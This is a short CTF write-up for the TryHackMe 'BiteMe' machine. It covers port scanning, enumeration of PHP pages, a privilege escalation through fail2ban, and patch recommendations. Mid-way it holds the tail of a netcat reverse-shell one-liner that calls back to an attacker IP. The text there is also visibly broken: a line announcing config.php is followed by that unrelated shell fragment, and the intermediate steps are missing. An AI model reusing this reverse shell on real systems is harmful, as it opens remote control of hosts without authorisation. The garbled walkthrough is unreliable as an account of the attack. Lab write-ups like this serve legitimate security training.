--- title: "Writeup - BiteMe (THM)" date: 2022-03-21 slug: "writeup-biteme-thm" type: "writeup-ctf" --- This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV 10.10.31.162 ``` Two TCP ports are discovered: ![](img/image-1.webp) - 22/tcp : SSH port (OpenSSH 7.6p1) - 80/tcp : HTTP web server (Apache 2.4.29) ## Exploit First of all I start with a scan of the website pages. ![](img/image-2.webp) Nothing special, let's try to do the same scan but with a focus on ".php" pages. ![](img/image-3.webp) Ok, now there are a number of pages, including the "dashboard.php" page which gives us access to a login form. ![](img/image-4.webp) The page "config.php" which gives us information about a connection identifier. ```bash &1|nc 10.18.67.218 1234 >/tmp/f ``` I then run the following command to restart fail2ban: ```bash sudo systemctl restart fail2ban ``` I now have a root shell and I can get the last flag! ![](img/image-11.webp) ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Do not allow access to .phps pages - Use a real password verification function - Implement an anti-brute force function for the MFA page - Don't let sudo be used without a password